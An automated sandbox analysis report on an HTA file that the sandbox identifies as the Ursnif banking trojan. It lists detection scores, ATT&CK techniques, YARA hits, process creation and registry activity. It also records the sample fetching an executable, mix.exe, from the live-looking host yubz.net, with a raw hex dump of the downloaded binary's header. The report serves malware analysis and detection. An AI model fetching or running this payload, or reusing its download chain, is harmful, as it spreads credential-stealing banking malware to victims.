Loading ...

Play interactive tourEdit tour

Analysis Report dokument11900326.hta

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:218146
Start date:26.03.2020
Start time:09:45:16
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 57s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:dokument11900326.hta
Cookbook file name:defaultwindowshtmlcookbook.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.bank.troj.evad.winHTA@14/40@2/1
EGA Information:
  • Successful, ratio: 33.3%
HDC Information:
  • Successful, ratio: 1.6% (good quality ratio 1.6%)
  • Quality average: 88.3%
  • Quality standard deviation: 19.3%
HCA Information:
  • Successful, ratio: 56%
  • Number of executed functions: 75
  • Number of non-executed functions: 93
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .hta
Warnings:
Show All
  • Exclude process from analysis (whitelisted): ielowutil.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 172.227.102.35, 8.248.113.254, 8.253.204.120, 67.27.159.254, 8.253.95.120, 67.27.233.126, 67.27.233.254, 67.27.235.126, 8.248.121.254, 2.18.68.82, 51.104.136.2, 152.199.19.161, 23.203.70.175, 40.127.240.158, 51.124.78.146
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, settingsfd-geo.trafficmanager.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, go.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 5572 because there are no executed function
  • Execution Graph export aborted for target mshta.exe, PID 6020 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold760 - 100false
Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation2Winlogon Helper DLLProcess Injection12Software Packing21Credential DumpingSystem Time Discovery1Remote File Copy11Email Collection1Data Encrypted1Remote File Copy11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExecution through API3Port MonitorsAccessibility FeaturesDeobfuscate/Decode Files or Information1Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExploitation for Client Execution1Accessibility FeaturesPath InterceptionObfuscated Files or Information2Input CaptureSecurity Software Discovery31Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseGraphical User Interface1System FirmwareDLL Search Order HijackingMasquerading1Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol12SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessVirtualization/Sandbox Evasion1Account ManipulationSystem Information Discovery25Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceProcess Injection12Brute ForceVirtualization/Sandbox Evasion1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskSoftware PackingTwo-Factor Authentication InterceptionProcess Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptSystem Owner/User Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainRemote System Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 4.2.ZwlegcGh.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00535632 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_00535632

Software Vulnerabilities:

barindex
Potential browser exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\mshta.exeJump to behavior

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Mar 2020 08:46:30 GMTServer: ApacheLast-Modified: Thu, 26 Mar 2020 08:46:11 GMTETag: "bdc00-5a1be044b0183"Accept-Ranges: bytesContent-Length: 777216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 f8 c3 87 b5 99 ad d4 b5 99 ad d4 b5 99 ad d4 bc e1 2e d4 b2 99 ad d4 ab cb 38 d4 af 99 ad d4 ab cb 2e d4 05 99 ad d4 ab cb 29 d4 0c 99 ad d4 bc e1 3e d4 a0 99 ad d4 b5 99 ac d4 68 9b ad d4 bc e1 27 d4 b4 99 ad d4 bc e1 39 d4 b4 99 ad d4 bc e1 3c d4 b4 99 ad d4 52 69 63 68 b5 99 ad d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c5 09 ca 49 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 02 07 00 00 d6 04 00 00 00 00 00 a0 df 02 00 00 10 00 00 00 20 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 0d 00 00 04 00 00 0f 0e 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 6d 09 00 b4 00 00 00 00 d0 0b 00 6c da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 26 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 33 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 cc 04 00 00 10 6d 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 01 07 00 00 10 00 00 00 02 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 52 67 02 00 00 20 07 00 00 68 02 00 00 06 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 3b 02 00 00 90 09 00 00 92 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6c da 01 00 00 d0 0b 00 00 dc 01 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Mar 2020 08:46:47 GMTServer: ApacheLast-Modified: Thu, 26 Mar 2020 08:46:11 GMTETag: "bdc00-5a1be044b0183"Accept-Ranges: bytesContent-Length: 777216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 f8 c3 87 b5 99 ad d4 b5 99 ad d4 b5 99 ad d4 bc e1 2e d4 b2 99 ad d4 ab cb 38 d4 af 99 ad d4 ab cb 2e d4 05 99 ad d4 ab cb 29 d4 0c 99 ad d4 bc e1 3e d4 a0 99 ad d4 b5 99 ac d4 68 9b ad d4 bc e1 27 d4 b4 99 ad d4 bc e1 39 d4 b4 99 ad d4 bc e1 3c d4 b4 99 ad d4 52 69 63 68 b5 99 ad d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c5 09 ca 49 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 02 07 00 00 d6 04 00 00 00 00 00 a0 df 02 00 00 10 00 00 00 20 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 0d 00 00 04 00 00 0f 0e 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 6d 09 00 b4 00 00 00 00 d0 0b 00 6c da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 26 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 33 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 cc 04 00 00 10 6d 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 01 07 00 00 10 00 00 00 02 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 52 67 02 00 00 20 07 00 00 68 02 00 00 06 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 3b 02 00 00 90 09 00 00 92 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6c da 01 00 00 d0 0b 00 00 dc 01 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /mix.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: mbKAtgJpDNErZbdadVkioVfOPUTSsLICwIDYyzNVLRrHwVHost: yubz.net
Source: global trafficHTTP traffic detected: GET /mix.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: mbKAtgJpDNErZbdadVkioVfOPUTSsLICwIDYyzNVLRrHwVHost: yubz.net
Found strings which match to known social media urlsShow sources
Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4557761c,0x01d6034b</date><accdate>0x4557761c,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4557761c,0x01d6034b</date><accdate>0x4559eb9a,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x456184d3,0x01d6034b</date><accdate>0x456184d3,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x456184d3,0x01d6034b</date><accdate>0x456184d3,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x45640d5e,0x01d6034b</date><accdate>0x45640d5e,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x45640d5e,0x01d6034b</date><accdate>0x45640d5e,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: yubz.net
Urls found in memory or binary dataShow sources
Source: imagestore.dat.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: msapplication.xml.7.drString found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.7.drString found in binary or memory: http://www.google.com/
Source: msapplication.xml2.7.drString found in binary or memory: http://www.live.com/
Source: msapplication.xml3.7.drString found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.7.drString found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.7.drString found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.7.drString found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.7.drString found in binary or memory: http://www.youtube.com/
Source: mshta.exe, 00000005.00000003.1138032623.0000000007053000.00000004.00000001.sdmpString found in binary or memory: http://yubz.net/
Source: mshta.exe, 00000005.00000003.1139887996.00000000034F5000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1138032623.0000000007053000.00000004.00000001.sdmpString found in binary or memory: http://yubz.net/mix.exe
Source: mshta.exe, 00000005.00000003.1139887996.00000000034F5000.00000004.00000001.sdmpString found in binary or memory: http://yubz.net/mix.exe0:?
Source: mshta.exe, 00000003.00000003.1092669500.0000000002EEC000.00000004.00000001.sdmpString found in binary or memory: http://yubz.net/mix.exe2
Source: mshta.exe, 00000005.00000003.1143682189.0000000006604000.00000004.00000001.sdmpString found in binary or memory: http://yubz.net/mix.exe7
Source: mshta.exe, 00000005.00000003.1139887996.00000000034F5000.00000004.00000001.sdmpString found in binary or memory: http://yubz.net/mix.exe?/
Source: mshta.exe, 00000003.00000003.1092669500.0000000002EEC000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.1087276441.00000000061C2000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.1084914589.0000000002F04000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1142675688.0000000006622000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1139887996.00000000034F5000.00000004.00000001.sdmpString found in binary or memory: https://abby.com
Source: mshta.exe, 00000003.00000003.1084914589.0000000002F04000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1141047489.00000000034AD000.00000004.00000001.sdmpString found in binary or memory: https://abby.com/
Source: mshta.exe, 00000005.00000003.1143682189.0000000006604000.00000004.00000001.sdmpString found in binary or memory: https://abby.comd
Source: imagestore.dat.9.drString found in binary or memory: https://www.msn.com/content/images/icons/Favicon_EdgeStart.ico
Source: imagestore.dat.9.drString found in binary or memory: https://www.msn.com/content/images/icons/Favicon_EdgeStart.ico~

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY

E-Banking Fraud:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00401360 GetProcAddress,NtCreateSection,memset,4_2_00401360
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004020BE NtMapViewOfSection,4_2_004020BE
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00533DCC LdrInitializeThunk,NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_00533DCC
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0041F8104_2_0041F810
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004518804_2_00451880
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0043CA304_2_0043CA30
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0043BC504_2_0043BC50
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0053A96C4_2_0053A96C
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_005343174_2_00534317
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_005361CC4_2_005361CC
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: String function: 00437E20 appears 37 times
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal76.bank.troj.evad.winHTA@14/40@2/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3DF24A3B-6F3E-11EA-AAE6-9CC1A2A860C6}.datJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFA6B85340EA66D50E.TMPJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3476 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Desktop\dokument11900326.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}file:///C:/Users/user/Desktop/dokument11900326.hta{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4900 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3476 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Desktop\dokument11900326.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}file:///C:/Users/user/Desktop/dokument11900326.hta{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} Jump to behavior
